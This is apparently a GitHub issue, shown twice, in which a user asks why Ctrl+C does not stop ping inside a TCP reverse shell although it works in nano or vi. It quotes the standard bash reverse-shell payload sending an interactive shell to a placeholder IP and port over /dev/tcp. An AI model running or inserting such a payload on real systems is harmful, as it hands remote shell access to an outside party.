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When I use TCP reverse shell, I can’t use ctrl + C when I use the ping command. Why? When using nano or vi, you can use ctrl + C
But the reverse connection script I used is bash -i >& /dev/tcp/IP/PORT 0>&1,You know this is the most commonly used reverse connection payload
I really look forward to hearing from you, thanks
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When I use TCP reverse shell, I can’t use ctrl + C when I use the ping command. Why? When using nano or vi, you can use ctrl + C
But the reverse connection script I used is bash -i >& /dev/tcp/IP/PORT 0>&1,You know this is the most commonly used reverse connection payload
I really look forward to hearing from you, thanks
The text was updated successfully, but these errors were encountered: